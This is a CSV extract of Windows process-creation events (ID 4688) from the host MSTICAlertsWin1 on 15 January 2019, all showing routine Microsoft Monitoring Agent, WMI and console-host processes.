315,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:25.863,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:25.863
316,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16d0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:26.007
317,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11a8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:23:26.000
318,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:51:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:51:26.000
319,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1050,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.000
320,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Windows\System32\conhost.exe,%%1936,0x1050,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.020
321,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:25.613,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:25.613
322,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:26.013
323,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:59:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:59:26.017
324,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.003
325,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\conhost.exe,%%1936,0x10e0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.017
326,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:25.363,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:25.363
327,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x518,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:26.000
328,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:03:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:03:26.000
329,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.000
330,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.020
331,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:25.837,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb50,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:25.837
332,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:26.007
333,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:26.007
334,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:52.640,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe3c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:52.640
335,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.000
336,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.027
337,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:25.293,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:25.293
338,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x108c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:26.003
339,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.260,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64/DesiredStateConfiguration\DscRun.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work\Registry.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.260
340,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.270,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0x28c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.270
341,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:55:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xddc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:55:26.000
342,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbe8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.003
343,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\conhost.exe,%%1936,0xbe8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.020
344,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:25.490
345,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1370,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:26.000
346,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:53:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x8e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:53:26.000
347,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.003
348,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\conhost.exe,%%1936,0x10fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.020
349,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:25.557,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7f8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:25.557
350,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:26.007
351,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:57:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:57:26.000
352,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa84,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.013
353,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1348,C:\Windows\System32\conhost.exe,%%1936,0xa84,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.030
354,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:25.427,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe34,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:25.427
355,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:26.010
356,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:24.523,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe"" -PerfMode optimize -quickscan -event -json -alldetectors",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:24.523
357,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:26.007
358,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:28.157,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e5,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:28.157
359,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.017
360,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.033,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.033
361,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:25.800,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:25.800
362,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:26.007